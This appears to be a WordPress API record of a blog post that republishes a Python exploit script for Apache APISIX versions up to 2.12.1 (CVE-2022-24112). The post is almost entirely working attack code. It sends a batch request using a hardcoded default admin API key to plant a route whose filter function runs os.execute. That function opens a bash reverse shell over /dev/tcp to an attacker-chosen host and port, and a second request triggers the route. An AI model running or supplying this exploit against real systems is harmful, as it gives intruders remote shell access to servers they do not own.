{"id":21862,"date":"2022-03-16T22:08:13","date_gmt":"2022-03-16T19:08:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166328\/apacheapisix2121-exec.txt"},"modified":"2022-03-19T09:40:47","modified_gmt":"2022-03-19T06:10:47","slug":"apache-apisix-2-12-1-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/apache-apisix-2-12-1-remote-code-execution\/","title":{"rendered":"Apache APISIX 2.12.1 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Apache APISIX 2.12.1 – Remote Code Execution (RCE)
\n# Date: 2022-03-16
\n# Exploit Author: Ven3xy
\n# Vendor Homepage: https:\/\/apisix.apache.org\/
\n# Version: Apache APISIX 1.3 \u2013 2.12.1
\n# Tested on: CentOS 7
\n# CVE : CVE-2022-24112<\/p>\n

import requests
\nimport sys<\/p>\n

class color:
\nHEADER = ‘\\033[95m’
\nIMPORTANT = ‘\\33[35m’
\nNOTICE = ‘\\033[33m’
\nOKBLUE = ‘\\033[94m’
\nOKGREEN = ‘\\033[92m’
\nWARNING = ‘\\033[93m’
\nRED = ‘\\033[91m’
\nEND = ‘\\033[0m’
\nUNDERLINE = ‘\\033[4m’
\nLOGGING = ‘\\33[34m’
\ncolor_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]\n

def banner():
\nrun = color_random[6]+”’\\n . ,
\n_.._ * __*\\.\/ ___ _ \\.\/._ | _ *-+-
\n(_][_)|_) |\/’\\ (\/,\/’\\[_)|(_)| |
\n| |
\n\\n”’
\nrun2 = color_random[2]+”’\\t\\t(CVE-2022-24112)\\n”’
\nrun3 = color_random[4]+”'{ Coded By: Ven3xy | Github: https:\/\/github.com\/M4xSec\/ }\\n\\n”’
\nprint(run+run2+run3)<\/p>\n

if (len(sys.argv) != 4):
\nbanner()
\nprint(“[!] Usage : .\/apisix-exploit.py <target_url> <lhost> <lport>”)
\nexit()<\/p>\n

else:
\nbanner()
\ntarget_url = sys.argv[1]\nlhost = sys.argv[2]\nlport = sys.argv[3]\n

headers1 = {
\n‘Host’: ‘127.0.0.1:8080’,
\n‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.81 Safari\/537.36 Edg\/97.0.1072.69’,
\n‘X-API-KEY’: ‘edd1c9f034335f136f87ad84b625c8f1’,
\n‘Accept’: ‘*\/*’,
\n‘Accept-Encoding’: ‘gzip, deflate’,
\n‘Content-Type’: ‘application\/json’,
\n‘Content-Length’: ‘540’,
\n‘Connection’: ‘close’,
\n}<\/p>\n

headers2 = {
\n‘Host’: ‘127.0.0.1:8080’,
\n‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.81 Safari\/537.36 Edg\/97.0.1072.69’,
\n‘X-API-KEY’: ‘edd1c9f034335f136f87ad84b625c8f1’,
\n‘Accept’: ‘*\/*’,
\n‘Accept-Encoding’: ‘gzip, deflate’,
\n‘Content-Type’: ‘application\/json’,
\n‘Connection’: ‘close’,
\n}<\/p>\n

json_data = {
\n‘headers’: {
\n‘X-Real-IP’: ‘127.0.0.1’,
\n‘X-API-KEY’: ‘edd1c9f034335f136f87ad84b625c8f1’,
\n‘Content-Type’: ‘application\/json’,
\n},
\n‘timeout’: 1500,
\n‘pipeline’: [
\n{
\n‘path’: ‘\/apisix\/admin\/routes\/index’,
\n‘method’: ‘PUT’,
\n‘body’: ‘{“uri”:”\/rms\/fzxewh”,”upstream”:{“type”:”roundrobin”,”nodes”:{“schmidt-schaefer.com”:1}},”name”:”wthtzv”,”filter_func”:”function(vars) os.execute(\\’bash -c \\\\\\\\\\\\”0<&160-;exec 160<>\/dev\/tcp\/’+lhost+’\/’+lport+’;sh <&160 >&160 2>&160\\\\\\\\\\\\”\\’); return true end”}’,
\n},
\n],
\n}<\/p>\n

response1 = requests.post(target_url+’apisix\/batch-requests’, headers=headers1, json=json_data, verify=False)<\/p>\n

response2 = requests.get(target_url+’rms\/fzxewh’, headers=headers2, verify=False)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Apache APISIX 2.12.1 – Remote Code Execution (RCE) # Date: 2022-03-16 # Exploit Author: Ven3xy # Vendor Homepage: https:\/\/apisix.apache.org\/ # Version: Apache APISIX 1.3 \u2013 2.12.1 # Tested on: CentOS 7 # CVE : CVE-2022-24112 import requests import sys class color: HEADER = ‘\\033[95m’ IMPORTANT = ‘\\33[35m’ NOTICE = ‘\\033[33m’ OKBLUE = …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21862","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21862","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21862"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21862\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21862"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21862"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21862"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}